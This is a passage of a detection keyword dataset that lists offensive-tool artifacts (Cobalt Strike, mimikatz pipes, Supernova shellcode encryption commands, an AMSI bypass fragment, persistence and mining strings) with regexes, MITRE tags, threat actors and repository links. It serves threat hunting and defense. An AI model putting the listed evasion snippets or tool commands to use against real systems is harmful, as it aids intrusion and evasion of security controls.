tool","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","#linux","N/A","N/A","1","93","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z","4225" "*.\""do`wnLO`ADS`TRinG\*",".{0,1000}\.\\\""do\`wnLO\`ADS\`TRinG\\.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","4226" "*.\\pipe\\mimikatz*",".{0,1000}\.\\\\pipe\\\\mimikatz.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#namedpipe","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","4227" "*.\dumpy.py*",".{0,1000}\.\\dumpy\.py.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","4228" "*.\stager.ps1*",".{0,1000}\.\\stager\.ps1.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in any way.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","4230" "*.2miners.com*",".{0,1000}\.2miners\.com.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","4235" "*.500.jasmin*",".{0,1000}\.500\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4236" "*.ACEshark.log*",".{0,1000}\.ACEshark\.log.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/t3l3machus/ACEshark","1","0","#logfile","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","4238" "*.admin.123456.*",".{0,1000}\.admin\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4239" 
"*.adminusers.txt*",".{0,1000}\.adminusers\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4240" "*.api.123456.*",".{0,1000}\.api\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4241" "*.apps.123456.*",".{0,1000}\.apps\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4245" 
"*.arsenal.json*",".{0,1000}\.arsenal\.json.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","4246" "*.asp --adcs --template Machine -smb2support*",".{0,1000}\.asp\s\-\-adcs\s\-\-template\sMachine\s\-smb2support.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","4247" "*.asreproast.txt*",".{0,1000}\.asreproast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4248" "*.Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*",".{0,1000}\.Assembly\.GetType\(\'System\.Management\.Automation\.AmsiUtils\'\)\.GetField\(\'amsiInitFailed\'.{0,1000}","offensive_tool_keyword","crackmapexec","amsibypass in crackmapexec and others","T1059.001 - T1562.001 - T1562.009","TA0005 - TA0040","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Defense Evasion","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","4250" "*.athena_utils *",".{0,1000}\.athena_utils\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","4251" "*.AzureAD.Application_Owners.csv*",".{0,1000}\.AzureAD\.Application_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4253" "*.AzureAD.DeviceList_Owners.csv*",".{0,1000}\.AzureAD\.DeviceList_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4254" "*.bashrc persistence setup successfully*",".{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","4256" "*.beta.123456.*",".{0,1000}\.beta\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the 
chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4257" "*.bin -enc rc4 -lang c -k 3 -o *.bin*",".{0,1000}\.bin\s\-enc\src4\s\-lang\sc\s\-k\s3\s\-o\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4259" "*.bin -enc rc4 -lang csharp -k 9*",".{0,1000}\.bin\s\-enc\src4\s\-lang\scsharp\s\-k\s9.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4260" "*.bin -enc rot -lang csharp -k 2 -d*",".{0,1000}\.bin\s\-enc\srot\s\-lang\scsharp\s\-k\s2\s\-d.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4261" "*.bin -enc rot -lang rust -k 7*",".{0,1000}\.bin\s\-enc\srot\s\-lang\srust\s\-k\s7.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4262" "*.bin -enc xor -lang csharp -k 2 -v nickvourd*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\scsharp\s\-k\s2\s\-v\snickvourd.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4263" "*.bin -enc xor -lang nim -k 4*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\snim\s\-k\s4.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4264" "*.blog.123456.*",".{0,1000}\.blog\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4267" 
"*.BruteRatel*",".{0,1000}\.BruteRatel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4268" "*.cobaltstrike*",".{0,1000}\.cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY 
- Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4270" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","4271" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","4272" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike 
HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","4273" "*.com/dcsync/*",".{0,1000}\.com\/dcsync\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","4274" 
